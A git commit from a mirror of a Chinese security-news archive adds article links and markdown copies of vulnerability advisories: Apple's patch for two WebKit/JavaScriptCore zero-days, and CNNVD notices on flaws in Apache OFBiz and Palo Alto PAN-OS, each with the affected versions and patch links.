mirror of
https://github.com/gelusus/wxvl.git
synced 2025-06-08 14:07:09 +00:00
补丁不给力,VMware vCenter 严重RCE漏洞遭利用、Apple 发布紧急更新以修补被积极利用的零日漏洞、苹果确认针对 macOS 系统的零日漏洞攻击、vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具、紫光档案管理系统 mergeFile SQL注入漏洞、【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击、一文读懂SSRF漏洞、DataCon晚自习 | 浅谈大模型辅助漏洞挖掘、CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害、命令执行漏洞基础、【成功复现】D-Link NAS远程命令执行漏洞(Cookie)、CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报、CNNVD | 关于Apache OFBiz安全漏洞的通报、中间件常见漏洞总结、苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞、奇安信集团获2024年世界互联网大会杰出贡献奖、第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示、一名优秀CISO的自述:是什么成就了我?、几个常见的越权漏洞挖掘案例、【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞、CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报、CNNVD关于Apache OFBiz安全漏洞的通报、信息安全漏洞周报(2024年第47期)、Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的、【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287)、【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524)、taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)、平板锅(Palo Alto)防火墙0day 漏洞分析及Exp、美国饮用水系统存在300多个漏洞,影响1.1亿人、【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474)、一次黑盒转变白盒前台漏洞审计过程、全球数据跨境流动合作倡议、美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览、
This commit is contained in:
parent
779ac2f2e7
commit
3bbe9e8b00
35
data.json
35
data.json
@ -256,5 +256,38 @@
|
|||||||
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=1&sn=dddb959fc1bb2fdc915c3c0b79b376cc": "漏洞预警 | 全程云OA SQL注入漏洞",
|
"https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491464&idx=1&sn=dddb959fc1bb2fdc915c3c0b79b376cc": "漏洞预警 | 全程云OA SQL注入漏洞",
|
||||||
"https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488439&idx=1&sn=3f053aa65cd1e0edc84e4e7baf0d87be": "【0day】资产管理运营系统(资管云)存在前台文件上传漏洞",
|
"https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488439&idx=1&sn=3f053aa65cd1e0edc84e4e7baf0d87be": "【0day】资产管理运营系统(资管云)存在前台文件上传漏洞",
|
||||||
"https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247502450&idx=1&sn=a1fc8665dfbb9c1703fef3c40ff25310&chksm=fe79eeeac90e67fcbf34eede7835db3aa9916a7a50c559be8c34d0446433f0f4d41189eb8b1a&scene=58&subscene=0": "【在野利用】Palo Alto Networks PAN-OS 身份认证绕过漏洞(CVE-2024-0012)安全风险通告",
|
"https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247502450&idx=1&sn=a1fc8665dfbb9c1703fef3c40ff25310&chksm=fe79eeeac90e67fcbf34eede7835db3aa9916a7a50c559be8c34d0446433f0f4d41189eb8b1a&scene=58&subscene=0": "【在野利用】Palo Alto Networks PAN-OS 身份认证绕过漏洞(CVE-2024-0012)安全风险通告",
|
||||||
"https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217&chksm=ce46151df9319c0b47c29456be191ccb1e9aa5c9d308c5e785ba7c175b75b7a3f6afe84ca4d6&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)"
|
"https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217&chksm=ce46151df9319c0b47c29456be191ccb1e9aa5c9d308c5e785ba7c175b75b7a3f6afe84ca4d6&scene=58&subscene=0": "上周关注度较高的产品安全漏洞(20241111-20241117)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247521523&idx=1&sn=286f99df03f25ebd1cb1fb497f991b21&chksm=ea94a599dde32c8fb84c9a7247de810f5f23bf5c0c99f55a79ff59780dc42aa54f886a151327&scene=58&subscene=0": "补丁不给力,VMware vCenter 严重RCE漏洞遭利用",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkzNjIzMjM5Ng==&mid=2247489994&idx=1&sn=7814bfad57686190c7bac0bc2903102f": "Apple 发布紧急更新以修补被积极利用的零日漏洞",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzA5NzQxMTczNA==&mid=2649166849&idx=3&sn=7d17b619580e9f94e8465b600d569241": "苹果确认针对 macOS 系统的零日漏洞攻击",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307561&idx=4&sn=4bfa46d48f4a7ec2bcdeb281d95354f8": "vulnhuntr:基于大语言模型和静态代码分析的漏洞扫描与分析工具",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkxNjY1MjY3OQ==&mid=2247487940&idx=1&sn=77723ded4c817fa7df978074334ee981": "紫光档案管理系统 mergeFile SQL注入漏洞",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066097&idx=3&sn=0e0cc754f2cdc596b5f8419a8fa6f7a5": "【安全圈】苹果发布紧急安全更新修复WebKit引擎中的漏洞 黑客已经利用漏洞展开攻击",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=Mzk0NTY5Nzc1OA==&mid=2247484133&idx=1&sn=52effc09cdcd03efa6380224aa30ad9c": "一文读懂SSRF漏洞",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzU5Njg1NzMyNw==&mid=2247488664&idx=2&sn=3e7b7e7edab1dffabf0816e27d18da3b": "DataCon晚自习 | 浅谈大模型辅助漏洞挖掘",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247524380&idx=3&sn=f9182149d88336b1242adda5aef422d1": "CVE-2024-20767 和 CVE-2024-21216 的补救措施:保护自己免受最近两个可在野外利用的严重漏洞的侵害",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=Mzg4MDY1MzUzNw==&mid=2247497938&idx=2&sn=8d13015033c4c8514aac0c0c5375b9df": "命令执行漏洞基础",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247502616&idx=1&sn=58bb44c2b1e5b68a5db14bccb1baca21": "【成功复现】D-Link NAS远程命令执行漏洞(Cookie)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664230091&idx=4&sn=263ea32ebfc468c8a503fd8a7d847988": "CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664230091&idx=5&sn=9950f25047c9a9cdb95f448751bcd9de": "CNNVD | 关于Apache OFBiz安全漏洞的通报",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=Mzg2NDY2MTQ1OQ==&mid=2247522987&idx=1&sn=563d193cf4b9a511831b8769974d8266": "中间件常见漏洞总结",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458583542&idx=2&sn=5be0221a6d9dac5a2b8d75ede77e159b": "苹果紧急发布安全更新,修复影响英特尔Mac的两个零日漏洞",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247622153&idx=1&sn=bdaf7d21183b302a2b5c4dcc98808c26": "奇安信集团获2024年世界互联网大会杰出贡献奖",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484351&idx=1&sn=f9ffabcc9b25602a911778f2121e66fa": "第十三期 · 安钥®「漏洞处置标准作业程序(SOP)」征文启示",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247631812&idx=1&sn=cb58ca9f66ae638242515b34d3fee572": "一名优秀CISO的自述:是什么成就了我?",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkzODUzMjA1MQ==&mid=2247484575&idx=1&sn=abd69fc656d121c2d04f7988fa8a2bee": "几个常见的越权漏洞挖掘案例",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247492658&idx=1&sn=57ec9a56c1b1cde21b51a26712d252a8": "【已复现】宝兰德BES应用服务器反序列化致远程代码执行漏洞",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=1&sn=c2d1b09182648cd2ba67f4f305a63865": "CNNVD关于Palo Alto Networks PAN-OS 安全漏洞的通报",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=2&sn=28601f77d7e3146b42cd9e063a788509": "CNNVD关于Apache OFBiz安全漏洞的通报",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzAxODY1OTM5OQ==&mid=2651461349&idx=3&sn=dd3fcba72938894feeccabe050dc7c05": "信息安全漏洞周报(2024年第47期)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzA3NTIyNzgwNA==&mid=2650259511&idx=1&sn=209eedf6288443cf581e203cfc45284c": "Palo Alto Networks零日防火墙漏洞是由开发人员的基本错误导致的",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500258&idx=2&sn=45c5ee1cc7cae505fcdfb13d0c6b1050": "【漏洞通告】Oracle Agile PLM Framework文件泄露漏洞(CVE-2024-21287)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500258&idx=3&sn=2a266e4509b9d0fb089ce92749c6f7ca": "【漏洞通告】Wget服务器端请求伪造漏洞(CVE-2024-10524)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkxODI4NDg3Nw==&mid=2247484726&idx=1&sn=591227dcdebf57686a3a4c2f953505eb": "taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492578&idx=2&sn=fa464eb54666d60dabd0a65ccbaeac63": "平板锅(Palo Alto)防火墙0day 漏洞分析及Exp",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650603759&idx=2&sn=986d8ed76f6fd390e46b43c2cec2df92": "美国饮用水系统存在300多个漏洞,影响1.1亿人",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650989812&idx=1&sn=fd1211672ea7e1d7357c9909c7600faa": "【知道创宇404实验室】警惕Palo Alto PAN-OS漏洞(CVE-2024-0012 和 CVE-2024-9474)",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzkyMjM5NDM3NQ==&mid=2247486083&idx=1&sn=eb8dc60a736b80cc2bcd90bc76f825b3": "一次黑盒转变白盒前台漏洞审计过程",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649400795&idx=1&sn=99b65e43e266182fd962e758b293c138": "全球数据跨境流动合作倡议",
|
||||||
|
"https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651133464&idx=2&sn=16e48bc09bde1b9e2e0b383257d60d2a": "美国国会图书馆邮件系统遭攻击,近9个月通信内容或泄露;ChatGPT沙箱环境存多个严重安全隐患,仅20%漏洞被修复 | 牛览"
|
||||||
}
|
}
|
169
doc/Apple 发布紧急更新以修补被积极利用的零日漏洞.md
Normal file
169
doc/Apple 发布紧急更新以修补被积极利用的零日漏洞.md
Normal file
@ -0,0 +1,169 @@
|
|||||||
|
# Apple 发布紧急更新以修补被积极利用的零日漏洞
|
||||||
|
信息安全大事件 2024-11-20 11:55
|
||||||
|
|
||||||
|
Apple
|
||||||
|
发布了适用于
|
||||||
|
iOS
|
||||||
|
、
|
||||||
|
iPadOS
|
||||||
|
、
|
||||||
|
macOS
|
||||||
|
、
|
||||||
|
visionOS
|
||||||
|
及其
|
||||||
|
Safari Web
|
||||||
|
浏览器的安全更新,以解决在野外被积极利用的两个零日漏洞。
|
||||||
|
|
||||||
|
缺陷如下所列 :
|
||||||
|
- CVE-2024-44308- JavaScriptCore
|
||||||
|
中的一个漏洞,在处理恶意
|
||||||
|
Web
|
||||||
|
内容时可能导致任意代码执行
|
||||||
|
|
||||||
|
- CVE-2024-44309- WebKit
|
||||||
|
中的一个
|
||||||
|
Cookie
|
||||||
|
管理漏洞,在处理恶意
|
||||||
|
Web
|
||||||
|
内容时可能导致跨站点脚本 (
|
||||||
|
XSS
|
||||||
|
) 攻击
|
||||||
|
|
||||||
|
这家 iPhone
|
||||||
|
制造商表示,它分别通过改进检查和改进状态管理解决了
|
||||||
|
CVE-2024-44308
|
||||||
|
和
|
||||||
|
CVE-2024-44309
|
||||||
|
。
|
||||||
|
|
||||||
|
关于利用的确切性质知之甚少,但 Apple
|
||||||
|
承认这两个漏洞
|
||||||
|
“
|
||||||
|
可能已在基于
|
||||||
|
Intel
|
||||||
|
的
|
||||||
|
Mac
|
||||||
|
系统上被积极利用
|
||||||
|
”
|
||||||
|
。
|
||||||
|
|
||||||
|
Google
|
||||||
|
威胁分析小组 (
|
||||||
|
TAG
|
||||||
|
) 的
|
||||||
|
Clément Lecigne
|
||||||
|
和
|
||||||
|
Benoît Sevens
|
||||||
|
因发现并报告这两个漏洞而受到赞誉,这表明它们可能被用作高度针对性政府支持或雇佣兵间谍软件攻击的一部分。
|
||||||
|
|
||||||
|
这些更新适用于以下设备和操作系统 :
|
||||||
|
- iOS 18.1.1 和 iPadOS 18.1.1
|
||||||
|
- iPhone XS
|
||||||
|
及更新机型、
|
||||||
|
iPad Pro 13
|
||||||
|
英寸、
|
||||||
|
iPad Pro 12.9
|
||||||
|
英寸(第
|
||||||
|
3
|
||||||
|
代及更新机型)、
|
||||||
|
iPad Pro 11
|
||||||
|
英寸(第
|
||||||
|
1
|
||||||
|
代及更新机型)、
|
||||||
|
iPad Air
|
||||||
|
第
|
||||||
|
3
|
||||||
|
代及更新机型、
|
||||||
|
iPad
|
||||||
|
第
|
||||||
|
7
|
||||||
|
代及更新机型、
|
||||||
|
iPad mini
|
||||||
|
第
|
||||||
|
5
|
||||||
|
代及更新机型
|
||||||
|
|
||||||
|
- iOS 17.7.2 和 iPadOS 17.7.2
|
||||||
|
- iPhone XS
|
||||||
|
及更新机型、
|
||||||
|
iPad Pro 13
|
||||||
|
英寸、
|
||||||
|
iPad Pro 12.9
|
||||||
|
英寸(第
|
||||||
|
2
|
||||||
|
代及更新机型)、
|
||||||
|
iPad Pro 10.5
|
||||||
|
英寸、
|
||||||
|
iPad Pro 11
|
||||||
|
英寸(第
|
||||||
|
1
|
||||||
|
代及更新机型)、
|
||||||
|
iPad Air
|
||||||
|
第
|
||||||
|
3
|
||||||
|
代及更新机型、
|
||||||
|
iPad
|
||||||
|
第
|
||||||
|
6
|
||||||
|
代及更新机型、
|
||||||
|
iPad mini
|
||||||
|
第
|
||||||
|
5
|
||||||
|
代及更新机型
|
||||||
|
|
||||||
|
- macOS Sequoia 15.1.1
|
||||||
|
-
|
||||||
|
运行
|
||||||
|
macOS Sequoia
|
||||||
|
的
|
||||||
|
Mac
|
||||||
|
|
||||||
|
- visionOS 2.1.1
|
||||||
|
- Apple Vision Pro
|
||||||
|
|
||||||
|
- Safari 18.1.1
|
||||||
|
-
|
||||||
|
运行
|
||||||
|
macOS Ventura
|
||||||
|
和
|
||||||
|
macOS Sonoma
|
||||||
|
的
|
||||||
|
Mac
|
||||||
|
|
||||||
|
到目前为止,Apple
|
||||||
|
今年已经解决了其软件中的四个零日漏洞,其中包括一个 (
|
||||||
|
CVE-2024-27834
|
||||||
|
),该漏洞在 Pwn2Own
|
||||||
|
温哥华黑客竞赛中演示。其他三个版本已于
|
||||||
|
2024
|
||||||
|
|
||||||
|
年 1 月
|
||||||
|
和 3
|
||||||
|
月修补。
|
||||||
|
|
||||||
|
建议用户尽快将设备更新到最新版本,以防范潜在威胁。
|
||||||
|
|
||||||
|
<table><tbody style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"><tr class="ue-table-interlace-color-single js_darkmode__6" data-style="-webkit-tap-highlight-color: transparent; outline: 0px; background-color: rgb(28, 28, 28); visibility: visible; color: rgb(205, 205, 205) !important;" style="-webkit-tap-highlight-color: transparent;outline: 0px;background-color: rgb(28, 28, 28);visibility: visible;color: rgb(205, 205, 205) !important;"><td width="557" valign="top" data-style="-webkit-tap-highlight-color: transparent; outline: 0px; word-break: break-all; hyphens: auto; border-color: rgb(76, 76, 76); background-color: rgb(255, 218, 169); visibility: visible; color: rgb(25, 25, 25) !important;" class="js_darkmode__7" style="-webkit-tap-highlight-color: transparent;outline: 0px;word-break: break-all;hyphens: auto;border-color: rgb(76, 76, 76);background-color: rgb(255, 218, 169);visibility: visible;color: rgb(25, 25, 25) !important;"><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;visibility: visible;"><span style="-webkit-tap-highlight-color: transparent;outline: 0px;font-size: 12px;visibility: visible;color: rgb(0, 0, 0);">尊敬的读者:<br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/>感谢您花时间阅读我们提供的这篇文章。我们非常重视您的时间和精力,并深知信息对您的重要性。<br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/>我们希望了解您对这篇文章的看法和感受。我们真诚地想知道您是否认为这篇文章为您带来了有价值的资讯和启示,是否有助于您的个人或职业发展。<br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/>如果您认为这篇文章对您非常有价值,并且希望获得更多的相关资讯和服务,我们愿意为您提供进一步的定制化服务。请通过填写我们提供的在线表单,与我们联系并提供您的邮箱地址或其他联系方式。我们将定期向您发送相关资讯和更新,以帮助您更好地了解我们的服务和文章内容。</span></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;visibility: visible;"><br style="-webkit-tap-highlight-color: transparent;outline: 0px;visibility: visible;"/></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;text-indent: 0em;visibility: visible;"><span style="-webkit-tap-highlight-color: transparent;outline: 0px;color: rgb(0, 0, 0);"> </span><img class="rich_pages wxw-img" data-backh="106" data-backw="106" data-cropselx1="0" data-cropselx2="119" data-cropsely1="0" data-cropsely2="119" data-galleryid="" data-imgfileid="100006343" data-ratio="1" data-s="300,640" data-type="png" data-w="1000" data-src="https://mmbiz.qpic.cn/sz_mmbiz_png/JqliagemfTA5N8G6ZVujodYTTD7NSaxFG5suXlkibicfoGRzCk6vHhCUBx7ST8b4AxdsFVNNAH4ltePBWX4AxKY0A/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp" style="-webkit-tap-highlight-color: transparent;outline: 0px;font-family: 宋体;font-size: 14px;letter-spacing: 0.578px;text-align: center;visibility: visible !important;width: 119px !important;"/></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;text-indent: 0em;"><span style="-webkit-tap-highlight-color: transparent;outline: 0px;font-family: 宋体;font-size: 12px;letter-spacing: 0.578px;text-align: center;color: rgb(0, 0, 0);"> 扫描二维码,参与调查</span></section><section style="-webkit-tap-highlight-color: transparent;outline: 0px;line-height: normal;"><br style="-webkit-tap-highlight-color: transparent;outline: 0px;letter-spacing: 0.544px;"/></section></td></tr></tbody></table>
|
||||||
|
|
||||||
|
|
||||||
|
**END**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
点击下方,关注公众号
|
||||||
|
|
||||||
|
获取免费咨询和安全服务
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
安全咨询/安全集成/安全运营
|
||||||
|
|
||||||
|
专业可信的信息安全应用服务商!
|
||||||
|
|
||||||
|
http://www.jsgjxx.com
|
||||||
|
|
||||||
|
|
||||||
|
|
71
doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md
Normal file
71
doc/CNNVD | 关于Apache OFBiz安全漏洞的通报.md
Normal file
@ -0,0 +1,71 @@
|
|||||||
|
# CNNVD | 关于Apache OFBiz安全漏洞的通报
|
||||||
|
中国信息安全 2024-11-20 10:12
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**扫码订阅《中国信息安全》**
|
||||||
|
|
||||||
|
|
||||||
|
邮发代号 2-786
|
||||||
|
|
||||||
|
征订热线:010-82341063
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**漏洞情况**
|
||||||
|
|
||||||
|
近日,国家信息安全漏洞库(CNNVD)收到关于Apache OFBiz安全漏洞(CNNVD-202411-2279、CVE-2024-47208)情况的报送。攻击者可以利用漏洞向目标发送恶意请求,通过服务端请求伪造的方式远程执行任意代码。Apache OFBiz 18.12.17以下版本受此漏洞影响。目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。
|
||||||
|
|
||||||
|
## 一漏洞介绍
|
||||||
|
|
||||||
|
|
||||||
|
Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。漏洞源于程序对URL校验不严格,攻击者可通过构造恶意URL绕过校验并注入Groovy 表达式代码或触发服务器端请求伪造(SSRF)攻击,导致远程代码执行。
|
||||||
|
|
||||||
|
## 二危害影响
|
||||||
|
|
||||||
|
|
||||||
|
Apache OFBiz 18.12.17以下版本受此漏洞影响。
|
||||||
|
|
||||||
|
## 三修复建议
|
||||||
|
|
||||||
|
|
||||||
|
目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方下载链接如下:
|
||||||
|
|
||||||
|
https://ofbiz.apache.org/download.html
|
||||||
|
|
||||||
|
本通报由CNNVD技术支撑单位——北京神州绿盟科技有限公司、深信服科技股份有限公司、西安交大捷普网络科技有限公司、数字新时代(山东)数据科技服务有限公司、安恒愿景(成都)信息科技有限公司、网宿科技股份有限公司等技术支撑单位提供支持。
|
||||||
|
|
||||||
|
CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。
|
||||||
|
|
||||||
|
联系方式:cnnvd@itsec.gov.cn
|
||||||
|
|
||||||
|
(来源:CNNVD)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**分享网络安全知识 强化网络安全意识**
|
||||||
|
|
||||||
|
**欢迎关注《中国信息安全》杂志官方抖音号**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
**《中国信息安全》杂志倾力推荐**
|
||||||
|
|
||||||
|
**“企业成长计划”**
|
||||||
|
|
||||||
|
|
||||||
|
**点击下图 了解详情**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[](http://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664162643&idx=1&sn=fcc4f3a6047a0c2f4e4cc0181243ee18&chksm=8b5ee7aabc296ebc7c8c9b145f16e6a5cf8316143db3edce69f2a312214d50a00f65d775198d&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
69
doc/CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报.md
Normal file
69
doc/CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报.md
Normal file
@ -0,0 +1,69 @@
|
|||||||
|
# CNNVD | 关于Palo Alto Networks PAN-OS安全漏洞的通报
|
||||||
|
中国信息安全 2024-11-20 10:12
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**扫码订阅《中国信息安全》**
|
||||||
|
|
||||||
|
|
||||||
|
邮发代号 2-786
|
||||||
|
|
||||||
|
征订热线:010-82341063
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**漏洞情况**
|
||||||
|
|
||||||
|
近日,国家信息安全漏洞库(CNNVD)收到关于Palo Alto Networks PAN-OS 安全漏洞(CNNVD-202411-2328、CVE-2024-0012)情况的报送。攻击者可以利用漏洞在未授权的情况下访问后台管理界面,进而获取管理员权限,控制目标设备。PAN-OS多个版本均受此漏洞影响。目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。
|
||||||
|
|
||||||
|
## 一漏洞介绍
|
||||||
|
|
||||||
|
|
||||||
|
Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。Palo Alto Networks PAN-OS存在安全漏洞,该漏洞源于设备存在身份验证绕过问题,攻击者利用漏洞可以在未授权的情况下登录后台管理界面,进而获取管理员权限,控制目标设备。
|
||||||
|
|
||||||
|
## 二危害影响
|
||||||
|
|
||||||
|
|
||||||
|
PAN-OS 10.2-10.2.12-h之前版本、PAN-OS 11.0-11.0.6-h之前版本、PAN-OS 11.1-11.1.5-h之前版本、PAN-OS 11.2-11.2.4-h1之前版本均受此漏洞影响。
|
||||||
|
|
||||||
|
## 三修复建议
|
||||||
|
|
||||||
|
|
||||||
|
目前,Palo Alto Networks官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方参考链接:
|
||||||
|
|
||||||
|
https://security.paloaltonetworks.com/CVE-2024-0012
|
||||||
|
|
||||||
|
本通报由CNNVD技术支撑单位——华为技术有限公司、奇安信网神信息技术(北京)股份有限公司、深圳市深信服信息安全有限公司、网宿科技股份有限公司、塞讯信息技术(上海)有限公司、杭州安恒信息技术股份有限公司、中孚安全技术有限公司、长扬科技(北京)股份有限公司、北京众安天下科技有限公司、上海云盾信息技术有限公司、广西网信信息技术有限公司等技术支撑单位提供支持。
|
||||||
|
|
||||||
|
CNNVD将继续跟踪上述漏洞的相关情况,及时发布相关信息。如有需要,可与CNNVD联系。
|
||||||
|
|
||||||
|
联系方式:cnnvd@itsec.gov.cn
|
||||||
|
|
||||||
|
(来源:CNNVD)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**分享网络安全知识 强化网络安全意识**
|
||||||
|
|
||||||
|
**欢迎关注《中国信息安全》杂志官方抖音号**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
**《中国信息安全》杂志倾力推荐**
|
||||||
|
|
||||||
|
**“企业成长计划”**
|
||||||
|
|
||||||
|
|
||||||
|
**点击下图 了解详情**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[](http://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664162643&idx=1&sn=fcc4f3a6047a0c2f4e4cc0181243ee18&chksm=8b5ee7aabc296ebc7c8c9b145f16e6a5cf8316143db3edce69f2a312214d50a00f65d775198d&scene=21#wechat_redirect)
|
||||||
|
|
||||||
|
|
44
doc/CNNVD关于Apache OFBiz安全漏洞的通报.md
Normal file
44
doc/CNNVD关于Apache OFBiz安全漏洞的通报.md
Normal file
@ -0,0 +1,44 @@
|
|||||||
|
# CNNVD关于Apache OFBiz安全漏洞的通报
|
||||||
|
原创 CNNVD CNNVD安全动态 2024-11-20 09:05
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**点击蓝字 关注我们**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
**漏洞情况**
|
||||||
|
|
||||||
|
近日,国家信息安全漏洞库(CNNVD)收到关于Apache OFBiz安全漏洞(CNNVD-202411-2279、CVE-2024-47208)情况的报送。攻击者可以利用漏洞向目标发送恶意请求,通过服务端请求伪造的方式远程执行任意代码。Apache OFBiz 18.12.17以下版本受此漏洞影响。目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。
|
||||||
|
|
||||||
|
## 一漏洞介绍
|
||||||
|
|
||||||
|
|
||||||
|
Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。漏洞源于程序对URL校验不严格,攻击者可通过构造恶意URL绕过校验并注入Groovy 表达式代码或触发服务器端请求伪造(SSRF)攻击,导致远程代码执行。
|
||||||
|
|
||||||
|
## 二危害影响
|
||||||
|
|
||||||
|
|
||||||
|
Apache OFBiz 18.12.17以下版本受此漏洞影响。
|
||||||
|
|
||||||
|
## 三修复建议
|
||||||
|
|
||||||
|
|
||||||
|
目前,Apache官方已发布新版本修复了该漏洞,建议用户及时确认产品版本,尽快采取修补措施。官方下载链接如下:
|
||||||
|
|
||||||
|
https://ofbiz.apache.org/download.html
|
||||||
|
|
||||||
|
